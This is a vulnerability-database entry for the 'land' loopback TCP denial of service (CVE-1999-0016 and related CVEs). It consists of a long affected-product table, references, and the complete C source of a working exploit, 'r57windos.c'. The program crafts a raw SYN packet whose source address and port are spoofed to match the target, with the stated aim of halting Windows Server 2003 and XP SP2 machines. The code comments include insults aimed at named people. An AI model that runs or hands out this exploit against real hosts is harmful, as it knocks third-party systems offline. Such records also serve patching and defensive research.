ID
VAR-E-199711-0004
CVE
cve_id: | CVE-1999-0016 | Trust: 1.9 |
cve_id: | CVE-2005-0688 | Trust: 0.6 |
cve_id: | CVE-2005-1649 | Trust: 0.3 |
EDB ID
20814
TITLE
FreeBSD 2.x / HP-UX 9/10/11 / Kernel 2.0.3 / Windows NT 4.0/Server 2003 / NetBSD 1 - 'land.c' loopback Denial of Service (5) - Windows dos Exploit
Trust: 0.6
DESCRIPTION
FreeBSD 2.x / HP-UX 9/10/11 / Kernel 2.0.3 / Windows NT 4.0/Server 2003 / NetBSD 1 - 'land.c' loopback Denial of Service (5). CVE-1999-0016CVE-14789 . dos exploit for Windows platform
Trust: 0.6
AFFECTED PRODUCTS
vendor: | hp | model: | hp-ux | scope: | eq | version: | 10.10 | Trust: 1.2 |
vendor: | freebsd | model: | hp-ux kernel windows nt 4.0/server netbsd | scope: | eq | version: | 2.x/9/10/11/2.0.3/2003/1 | Trust: 1.0 |
vendor: | sun | model: | sunos | scope: | eq | version: | 4.1.4 | Trust: 0.6 |
vendor: | sun | model: | sunos u1 | scope: | eq | version: | 4.1.3 | Trust: 0.6 |
vendor: | sco | model: | unixware | scope: | eq | version: | 2.1 | Trust: 0.6 |
vendor: | sco | model: | open server | scope: | eq | version: | 5.0 | Trust: 0.6 |
vendor: | sco | model: | open desktop | scope: | eq | version: | 3.0 | Trust: 0.6 |
vendor: | sco | model: | cmw+ | scope: | eq | version: | 3.0 | Trust: 0.6 |
vendor: | novell | model: | netware | scope: | eq | version: | 4.1 | Trust: 0.6 |
vendor: | netbsd | model: | netbsd | scope: | eq | version: | 1.2.1 | Trust: 0.6 |
vendor: | netbsd | model: | netbsd | scope: | eq | version: | 1.2 | Trust: 0.6 |
vendor: | netbsd | model: | netbsd | scope: | eq | version: | 1.1 | Trust: 0.6 |
vendor: | netbsd | model: | netbsd | scope: | eq | version: | 1.0 | Trust: 0.6 |
vendor: | microsoft | model: | windows xp tablet pc edition sp2 | scope: | - | version: | - | Trust: 0.6 |
vendor: | microsoft | model: | windows xp tablet pc edition sp1 | scope: | - | version: | - | Trust: 0.6 |
vendor: | microsoft | model: | windows xp tablet pc edition | scope: | - | version: | - | Trust: 0.6 |
vendor: | microsoft | model: | windows xp professional sp2 | scope: | - | version: | - | Trust: 0.6 |
vendor: | microsoft | model: | windows xp professional sp1 | scope: | - | version: | - | Trust: 0.6 |
vendor: | microsoft | model: | windows xp professional | scope: | - | version: | - | Trust: 0.6 |
vendor: | microsoft | model: | windows xp media center edition sp2 | scope: | - | version: | - | Trust: 0.6 |
vendor: | microsoft | model: | windows xp media center edition sp1 | scope: | - | version: | - | Trust: 0.6 |
vendor: | microsoft | model: | windows xp media center edition | scope: | - | version: | - | Trust: 0.6 |
vendor: | microsoft | model: | windows xp home sp2 | scope: | - | version: | - | Trust: 0.6 |
vendor: | microsoft | model: | windows xp home sp1 | scope: | - | version: | - | Trust: 0.6 |
vendor: | microsoft | model: | windows xp home | scope: | - | version: | - | Trust: 0.6 |
vendor: | microsoft | model: | windows xp 64-bit edition version sp1 | scope: | eq | version: | 2003 | Trust: 0.6 |
vendor: | microsoft | model: | windows xp 64-bit edition version | scope: | eq | version: | 2003 | Trust: 0.6 |
vendor: | microsoft | model: | windows xp 64-bit edition sp1 | scope: | - | version: | - | Trust: 0.6 |
vendor: | microsoft | model: | windows xp 64-bit edition | scope: | - | version: | - | Trust: 0.6 |
vendor: | microsoft | model: | windows server web edition sp1 beta | scope: | eq | version: | 20031 | Trust: 0.6 |
vendor: | microsoft | model: | windows server web edition sp1 | scope: | eq | version: | 2003 | Trust: 0.6 |
vendor: | microsoft | model: | windows server web edition | scope: | eq | version: | 2003 | Trust: 0.6 |
vendor: | microsoft | model: | windows server standard edition sp1 beta | scope: | eq | version: | 20031 | Trust: 0.6 |
vendor: | microsoft | model: | windows server standard edition sp1 | scope: | eq | version: | 2003 | Trust: 0.6 |
vendor: | microsoft | model: | windows server standard edition | scope: | eq | version: | 2003 | Trust: 0.6 |
vendor: | microsoft | model: | windows server enterprise edition itanium sp1 beta | scope: | eq | version: | 20031 | Trust: 0.6 |
vendor: | microsoft | model: | windows server enterprise edition itanium sp1 | scope: | eq | version: | 2003 | Trust: 0.6 |
vendor: | microsoft | model: | windows server enterprise edition itanium | scope: | eq | version: | 20030 | Trust: 0.6 |
vendor: | microsoft | model: | windows server enterprise edition sp1 beta | scope: | eq | version: | 20031 | Trust: 0.6 |
vendor: | microsoft | model: | windows server enterprise edition sp1 | scope: | eq | version: | 2003 | Trust: 0.6 |
vendor: | microsoft | model: | windows server enterprise edition | scope: | eq | version: | 2003 | Trust: 0.6 |
vendor: | microsoft | model: | windows server datacenter edition itanium sp1 beta | scope: | eq | version: | 20031 | Trust: 0.6 |
vendor: | microsoft | model: | windows server datacenter edition itanium sp1 | scope: | eq | version: | 2003 | Trust: 0.6 |
vendor: | microsoft | model: | windows server datacenter edition itanium | scope: | eq | version: | 20030 | Trust: 0.6 |
vendor: | microsoft | model: | windows server datacenter edition sp1 beta | scope: | eq | version: | 20031 | Trust: 0.6 |
vendor: | microsoft | model: | windows server datacenter edition sp1 | scope: | eq | version: | 2003 | Trust: 0.6 |
vendor: | microsoft | model: | windows server datacenter edition | scope: | eq | version: | 2003 | Trust: 0.6 |
vendor: | microsoft | model: | windows nt workstation sp3 | scope: | eq | version: | 4.0 | Trust: 0.6 |
vendor: | microsoft | model: | windows nt workstation sp2 | scope: | eq | version: | 4.0 | Trust: 0.6 |
vendor: | microsoft | model: | windows nt workstation sp1 | scope: | eq | version: | 4.0 | Trust: 0.6 |
vendor: | microsoft | model: | windows nt workstation | scope: | eq | version: | 4.0 | Trust: 0.6 |
vendor: | microsoft | model: | windows nt terminal server sp3 | scope: | eq | version: | 4.0 | Trust: 0.6 |
vendor: | microsoft | model: | windows nt terminal server sp2 | scope: | eq | version: | 4.0 | Trust: 0.6 |
vendor: | microsoft | model: | windows nt terminal server sp1 | scope: | eq | version: | 4.0 | Trust: 0.6 |
vendor: | microsoft | model: | windows nt terminal server | scope: | eq | version: | 4.0 | Trust: 0.6 |
vendor: | microsoft | model: | windows nt server sp3 | scope: | eq | version: | 4.0 | Trust: 0.6 |
vendor: | microsoft | model: | windows nt server sp2 | scope: | eq | version: | 4.0 | Trust: 0.6 |
vendor: | microsoft | model: | windows nt server sp1 | scope: | eq | version: | 4.0 | Trust: 0.6 |
vendor: | microsoft | model: | windows nt server | scope: | eq | version: | 4.0 | Trust: 0.6 |
vendor: | microsoft | model: | windows nt enterprise server sp3 | scope: | eq | version: | 4.0 | Trust: 0.6 |
vendor: | microsoft | model: | windows nt enterprise server sp2 | scope: | eq | version: | 4.0 | Trust: 0.6 |
vendor: | microsoft | model: | windows nt enterprise server sp1 | scope: | eq | version: | 4.0 | Trust: 0.6 |
vendor: | microsoft | model: | windows nt enterprise server | scope: | eq | version: | 4.0 | Trust: 0.6 |
vendor: | microsoft | model: | windows nt | scope: | eq | version: | 3.5.1 | Trust: 0.6 |
vendor: | microsoft | model: | windows | scope: | eq | version: | 95 | Trust: 0.6 |
vendor: | marconi | model: | atm switch | scope: | eq | version: | 7.0.1 | Trust: 0.6 |
vendor: | marconi | model: | atm switch | scope: | eq | version: | 6.1.1 | Trust: 0.6 |
vendor: | linux | model: | kernel | scope: | eq | version: | 2.0.31 | Trust: 0.6 |
vendor: | linux | model: | kernel | scope: | eq | version: | 2.0.30 | Trust: 0.6 |
vendor: | hp | model: | hp-ux | scope: | eq | version: | 10.24 | Trust: 0.6 |
vendor: | hp | model: | hp-ux | scope: | eq | version: | 11.0 | Trust: 0.6 |
vendor: | hp | model: | hp-ux | scope: | eq | version: | 10.30 | Trust: 0.6 |
vendor: | hp | model: | hp-ux | scope: | eq | version: | 10.20 | Trust: 0.6 |
vendor: | hp | model: | hp-ux | scope: | eq | version: | 10.16 | Trust: 0.6 |
vendor: | hp | model: | hp-ux | scope: | eq | version: | 10.01 | Trust: 0.6 |
vendor: | hp | model: | hp-ux | scope: | eq | version: | 10.0 | Trust: 0.6 |
vendor: | hp | model: | hp-ux | scope: | eq | version: | 9.0 | Trust: 0.6 |
vendor: | freebsd | model: | freebsd | scope: | eq | version: | 2.2.5 | Trust: 0.6 |
vendor: | freebsd | model: | freebsd | scope: | eq | version: | 2.2.4 | Trust: 0.6 |
vendor: | freebsd | model: | freebsd | scope: | eq | version: | 2.2.3 | Trust: 0.6 |
vendor: | freebsd | model: | freebsd | scope: | eq | version: | 2.2 | Trust: 0.6 |
vendor: | freebsd | model: | freebsd | scope: | eq | version: | 2.1.6.1 | Trust: 0.6 |
vendor: | freebsd | model: | freebsd | scope: | eq | version: | 2.1.6 | Trust: 0.6 |
vendor: | freebsd | model: | freebsd | scope: | eq | version: | 2.1.5 | Trust: 0.6 |
vendor: | freebsd | model: | freebsd | scope: | eq | version: | 2.1x | Trust: 0.6 |
vendor: | freebsd | model: | freebsd | scope: | eq | version: | 2.1 | Trust: 0.6 |
vendor: | cisco | model: | ios/700 | scope: | eq | version: | 1.0 | Trust: 0.6 |
vendor: | cisco | model: | ios | scope: | eq | version: | 11.2 | Trust: 0.6 |
vendor: | cisco | model: | ios | scope: | eq | version: | 11.1 | Trust: 0.6 |
vendor: | cisco | model: | ios | scope: | eq | version: | 11.0 | Trust: 0.6 |
vendor: | cisco | model: | ios | scope: | eq | version: | 10.3 | Trust: 0.6 |
vendor: | bsdi | model: | bsd/os | scope: | eq | version: | 2.1 | Trust: 0.6 |
vendor: | bsdi | model: | bsd/os | scope: | eq | version: | 2.0.1 | Trust: 0.6 |
vendor: | bsdi | model: | bsd/os | scope: | eq | version: | 2.0 | Trust: 0.6 |
vendor: | bsdi | model: | bsd/os | scope: | eq | version: | 1.1 | Trust: 0.6 |
vendor: | netbsd | model: | netbsd | scope: | ne | version: | 1.3.2 | Trust: 0.6 |
vendor: | netbsd | model: | netbsd | scope: | ne | version: | 1.3.1 | Trust: 0.6 |
vendor: | netbsd | model: | netbsd | scope: | ne | version: | 1.3 | Trust: 0.6 |
vendor: | microsoft | model: | windows nt workstation sp4 | scope: | ne | version: | 4.0 | Trust: 0.6 |
vendor: | microsoft | model: | windows nt terminal server sp4 | scope: | ne | version: | 4.0 | Trust: 0.6 |
vendor: | microsoft | model: | windows nt server sp4 | scope: | ne | version: | 4.0 | Trust: 0.6 |
vendor: | microsoft | model: | windows nt enterprise server sp4 | scope: | ne | version: | 4.0 | Trust: 0.6 |
vendor: | linux | model: | kernel | scope: | ne | version: | 2.2.10 | Trust: 0.6 |
vendor: | linux | model: | kernel | scope: | ne | version: | 2.2 | Trust: 0.6 |
vendor: | linux | model: | kernel | scope: | ne | version: | 2.1.x | Trust: 0.6 |
vendor: | linux | model: | kernel | scope: | ne | version: | 2.1 | Trust: 0.6 |
vendor: | linux | model: | kernel | scope: | ne | version: | 2.0.38 | Trust: 0.6 |
vendor: | linux | model: | kernel | scope: | ne | version: | 2.0.37 | Trust: 0.6 |
vendor: | linux | model: | kernel | scope: | ne | version: | 2.0.36 | Trust: 0.6 |
vendor: | linux | model: | kernel | scope: | ne | version: | 2.0.35 | Trust: 0.6 |
vendor: | linux | model: | kernel | scope: | ne | version: | 2.0.34 | Trust: 0.6 |
vendor: | linux | model: | kernel | scope: | ne | version: | 2.0.33 | Trust: 0.6 |
vendor: | linux | model: | kernel | scope: | ne | version: | 2.0.32 | Trust: 0.6 |
vendor: | freebsd | model: | freebsd | scope: | ne | version: | 2.2.8 | Trust: 0.6 |
vendor: | freebsd | model: | freebsd | scope: | ne | version: | 2.2.6 | Trust: 0.6 |
vendor: | freebsd | model: | freebsd | scope: | ne | version: | 2.2.2 | Trust: 0.6 |
vendor: | freebsd | model: | freebsd | scope: | ne | version: | 3.x | Trust: 0.6 |
vendor: | cisco | model: | ios | scope: | ne | version: | 11.2.10 | Trust: 0.6 |
vendor: | cisco | model: | ios p | scope: | ne | version: | 11.2.9 | Trust: 0.6 |
vendor: | cisco | model: | ios f1 | scope: | ne | version: | 11.2.4 | Trust: 0.6 |
vendor: | cisco | model: | ios f | scope: | ne | version: | 11.2.4 | Trust: 0.6 |
vendor: | cisco | model: | ios | scope: | ne | version: | 11.2.4 | Trust: 0.6 |
vendor: | cisco | model: | ios ia | scope: | ne | version: | 11.1.15 | Trust: 0.6 |
vendor: | cisco | model: | ios ca | scope: | ne | version: | 11.1.15 | Trust: 0.6 |
vendor: | cisco | model: | ios aa | scope: | ne | version: | 11.1.15 | Trust: 0.6 |
vendor: | cisco | model: | ios | scope: | ne | version: | 11.1.15 | Trust: 0.6 |
vendor: | cisco | model: | ios ia | scope: | ne | version: | 11.1.9 | Trust: 0.6 |
vendor: | cisco | model: | ios ca | scope: | ne | version: | 11.1.7 | Trust: 0.6 |
vendor: | cisco | model: | ios aa | scope: | ne | version: | 11.1.7 | Trust: 0.6 |
vendor: | cisco | model: | ios | scope: | ne | version: | 11.1.7 | Trust: 0.6 |
vendor: | cisco | model: | ios bt | scope: | ne | version: | 11.0.17 | Trust: 0.6 |
vendor: | cisco | model: | ios | scope: | ne | version: | 11.0.17 | Trust: 0.6 |
vendor: | cisco | model: | ios bt | scope: | ne | version: | 11.0.12 | Trust: 0.6 |
vendor: | cisco | model: | ios a | scope: | ne | version: | 10.3.19 | Trust: 0.6 |
vendor: | cisco | model: | ios | scope: | ne | version: | 10.3.16 | Trust: 0.6 |
vendor: | cisco | model: | catalyst supervisor software | scope: | ne | version: | 29xx2.4.401 | Trust: 0.6 |
vendor: | cisco | model: | catalyst supervisor software | scope: | ne | version: | 29xx2.1.1102 | Trust: 0.6 |
vendor: | bsdi | model: | bsd/os | scope: | ne | version: | 4.0.1 | Trust: 0.6 |
vendor: | bsdi | model: | bsd/os | scope: | ne | version: | 4.0 | Trust: 0.6 |
vendor: | bsdi | model: | bsd/os | scope: | ne | version: | 3.1 | Trust: 0.6 |
vendor: | bsdi | model: | bsd/os | scope: | ne | version: | 3.0 | Trust: 0.6 |
vendor: | freebsd | model: | 2.x,hp-ux 9/10/11,kernel 2.0.3,windows nt 4.0/server 2003,netbsd | scope: | eq | version: | 1 | Trust: 0.6 |
vendor: | microsoft | model: | windows xp professional edition | scope: | eq | version: | x64 | Trust: 0.3 |
vendor: | microsoft | model: | windows xp gold | scope: | eq | version: | 0 | Trust: 0.3 |
vendor: | microsoft | model: | windows xp embedded sp1 | scope: | - | version: | - | Trust: 0.3 |
vendor: | microsoft | model: | windows xp embedded | scope: | - | version: | - | Trust: 0.3 |
vendor: | microsoft | model: | windows xp | scope: | eq | version: | 0 | Trust: 0.3 |
vendor: | microsoft | model: | windows server standard edition | scope: | eq | version: | 2003x64 | Trust: 0.3 |
vendor: | microsoft | model: | windows server enterprise edition | scope: | eq | version: | 2003x64 | Trust: 0.3 |
vendor: | microsoft | model: | windows server datacenter edition | scope: | eq | version: | 2003x64 | Trust: 0.3 |
vendor: | avaya | model: | modular messaging | scope: | eq | version: | 3.0 | Trust: 0.3 |
vendor: | microsoft | model: | windows nt sp3 alpha | scope: | eq | version: | 4.0 | Trust: 0.3 |
vendor: | microsoft | model: | windows nt sp3 | scope: | eq | version: | 4.0 | Trust: 0.3 |
vendor: | microsoft | model: | windows nt sp2 | scope: | eq | version: | 4.0 | Trust: 0.3 |
vendor: | microsoft | model: | windows nt sp1 | scope: | eq | version: | 4.0 | Trust: 0.3 |
vendor: | microsoft | model: | windows nt | scope: | eq | version: | 4.0 | Trust: 0.3 |
vendor: | microsoft | model: | windows nt sp6 | scope: | ne | version: | 4.0 | Trust: 0.3 |
vendor: | microsoft | model: | windows nt sp5 | scope: | ne | version: | 4.0 | Trust: 0.3 |
vendor: | microsoft | model: | windows nt sp4 | scope: | ne | version: | 4.0 | Trust: 0.3 |
EXPLOIT
/*
source: https://www.securityfocus.com/bid/2666/info
A number of TCP/IP stacks are vulnerable to a "loopback" condition initiated by sending a TCP SYN packet with the source address and port spoofed to equal the destination source and port. When a packet of this sort is received, an infinite loop is initiated and the affected system halts. This is known to affect Windows 95, Windows NT 4.0 up to SP3, Windows Server 2003, Windows XP SP2, Cisco IOS devices & Catalyst switches, and HP-UX up to 11.00.
It is noted that on Windows Server 2003 and XP SP2, the TCP and IP checksums must be correct to trigger the issue.
**Update: It is reported that Microsoft platforms are also prone to this vulnerability. The vendor reports that network routers may not route malformed TCP/IP packets used to exploit this issue. As a result, an attacker may have to discover a suitable route to a target computer, or reside on the target network segment itself before exploitation is possible.
*/
#define _BSD_SOURCE
#include <stdio.h>
#include <ctype.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <netinet/tcp.h>
#include <sysexits.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
/*
Windows Server 2003 and XP SP2 remote DoS exploit
Tested under OpenBSD 3.6 at WinXP SP 2
Vuln by Dejan Levaja <dejan_@_levaja.com>
(c)oded by __blf 2005 RusH Security Team , http://rst.void.ru
Gr33tz: zZz, Phoenix, MishaSt, Inck-vizitor
Fuck lamerz: Saint_I, nmalykh, Mr. Clumsy
All rights reserved.
*/
//checksum function by r0ach
u_short checksum (u_short *addr, int len)
{
u_short *w = addr;
int i = len;
int sum = 0;
u_short answer;
while (i > 0)
{
sum += *w++;
i-=2;
}
if (i == 1) sum += *(u_char *)w;
sum = (sum >> 16) + (sum & 0xffff);
sum = sum + (sum >> 16);
return (~sum);
}
int main(int argc, char ** argv)
{
struct in_addr src, dst;
struct sockaddr_in sin;
struct _pseudoheader {
struct in_addr source_addr;
struct in_addr destination_addr;
u_char zero;
u_char protocol;
u_short length;
} pseudoheader;
struct ip * iph;
struct tcphdr * tcph;
int mysock;
u_char * packet;
u_char * pseudopacket;
int on = 1;
if( argc != 3)
{
fprintf(stderr, "r57windos.c by __blf\n");
fprintf(stderr, "RusH Security Team\n");
fprintf(stderr, "Usage: %s <dest ip> <dest port>\n", argv[0]);
return EX_USAGE;
}
if ((packet = (char *)malloc(sizeof(struct ip) + sizeof(struct tcphdr))) == NULL)
{
perror("malloc()\n");
return EX_OSERR;
}
inet_aton(argv[1], &src);
inet_aton(argv[1], &dst);
iph = (struct ip *) packet;
iph->ip_v = IPVERSION;
iph->ip_hl = 5;
iph->ip_tos = 0;
iph->ip_len = ntohs(sizeof(struct ip) + sizeof(struct tcphdr));
iph->ip_off = htons(IP_DF);
iph->ip_ttl = 255;
iph->ip_p = IPPROTO_TCP;
iph->ip_sum = 0;
iph->ip_src = src;
iph->ip_dst = dst;
tcph = (struct tcphdr *)(packet +sizeof(struct ip));
tcph->th_sport = htons(atoi(argv[2]));
tcph->th_dport = htons(atoi(argv[2]));
tcph->th_seq = ntohl(rand());
tcph->th_ack = rand();
tcph->th_off = 5;
tcph->th_flags = TH_SYN; // setting up TCP SYN flag here
tcph->th_win = htons(512);
tcph->th_sum = 0;
tcph->th_urp = 0;
pseudoheader.source_addr = src;
pseudoheader.destination_addr = dst;
pseudoheader.zero = 0;
pseudoheader.protocol = IPPROTO_TCP;
pseudoheader.length = htons(sizeof(struct tcphdr));
if((pseudopacket = (char *)malloc(sizeof(pseudoheader)+sizeof(struct tcphdr))) == NULL)
{
perror("malloc()\n");
return EX_OSERR;
}
memcpy(pseudopacket, &pseudoheader, sizeof(pseudoheader));
memcpy(pseudopacket + sizeof(pseudoheader), packet + sizeof(struct ip), sizeof(struct tcphdr));
tcph->th_sum = checksum((u_short *)pseudopacket, sizeof(pseudoheader) + sizeof(struct tcphdr));
mysock = socket(PF_INET, SOCK_RAW, IPPROTO_RAW);
if(!mysock)
{
perror("socket!\n");
return EX_OSERR;
}
if(setsockopt(mysock, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on)) == -1)
{
perror("setsockopt");
shutdown(mysock, 2);
return EX_OSERR;
}
sin.sin_family = PF_INET;
sin.sin_addr = dst;
sin.sin_port = htons(80);
if(sendto(mysock, packet, sizeof(struct ip) + sizeof(struct tcphdr), 0, (struct sockaddr *)&sin, sizeof(sin)) == -1)
{
perror("sendto()\n");
shutdown(mysock, 2);
return EX_OSERR;
}
printf("Packet sent. Remote machine should be down.\n");
shutdown(mysock, 2);
return EX_OK;
}
Trust: 1.0
EXPLOIT LANGUAGE
c
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
'land.c' loopback Denial of Service (5)
Trust: 1.0
CREDITS
Dejan Levaja
Trust: 0.6
EXTERNAL IDS
db: | NVD | id: | CVE-1999-0016 | Trust: 1.9 |
db: | EXPLOIT-DB | id: | 20814 | Trust: 1.9 |
db: | BID | id: | 2666 | Trust: 1.9 |
db: | NVD | id: | CVE-2005-0688 | Trust: 0.6 |
db: | EDBNET | id: | 42940 | Trust: 0.6 |
db: | NVD | id: | CVE-2005-1649 | Trust: 0.3 |
db: | BID | id: | 13658 | Trust: 0.3 |
REFERENCES
url: | https://nvd.nist.gov/vuln/detail/cve-1999-0016 | Trust: 1.6 |
url: | https://www.securityfocus.com/bid/2666/info | Trust: 1.0 |
url: | http://www.microsoft.com/technet/security/bulletin/ms05-019.mspx | Trust: 0.6 |
url: | http://support.microsoft.com/support/kb/articles/q165/0/05.asp | Trust: 0.6 |
url: | http://www.cisco.com/warp/public/770/land-pub.shtml#iosvers | Trust: 0.6 |
url: | http://support.novell.com/cgi-bin/search/tidfinder.cgi?2932511 | Trust: 0.6 |
url: | http://support.microsoft.com/support/kb/articles/q177/5/39.asp | Trust: 0.6 |
url: | http://www.securityfocus.com/archive/1/392354 | Trust: 0.6 |
url: | https://www.exploit-db.com/exploits/20814/ | Trust: 0.6 |
url: | http://support.avaya.com/elmodocs2/security/asa-2006-217.htm | Trust: 0.3 |
url: | http://www.microsoft.com/technet/security/bulletin/ms06-064.mspx | Trust: 0.3 |
url: | https://www.exploit-db.com/exploits/20812 | Trust: 0.3 |
url: | https://www.exploit-db.com/exploits/20810 | Trust: 0.3 |
url: | https://www.exploit-db.com/exploits/20814 | Trust: 0.3 |
url: | https://www.exploit-db.com/exploits/20813 | Trust: 0.3 |
url: | https://www.exploit-db.com/exploits/20811 | Trust: 0.3 |
SOURCES
db: | BID | id: | 13658 |
db: | BID | id: | 2666 |
db: | EXPLOIT-DB | id: | 20814 |
db: | EDBNET | id: | 42940 |
LAST UPDATE DATE
2022-07-27T09:17:41.185000+00:00
SOURCES UPDATE DATE
db: | BID | id: | 13658 | date: | 2016-07-06T14:40:00 |
db: | BID | id: | 2666 | date: | 2009-07-11T06:06:00 |
SOURCES RELEASE DATE
db: | BID | id: | 13658 | date: | 2005-05-17T00:00:00 |
db: | BID | id: | 2666 | date: | 1997-11-20T00:00:00 |
db: | EXPLOIT-DB | id: | 20814 | date: | 1997-11-20T00:00:00 |
db: | EDBNET | id: | 42940 | date: | 1997-11-20T00:00:00 |